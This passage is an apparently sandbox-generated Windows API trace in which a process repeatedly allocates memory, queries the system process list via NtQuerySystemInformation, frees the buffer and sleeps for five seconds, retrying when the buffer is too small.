NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.636] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.682] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.698] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.717] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.729] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.775] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.809] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.869] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.884] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.900] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.917] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.932] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.948] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.962] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.994] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 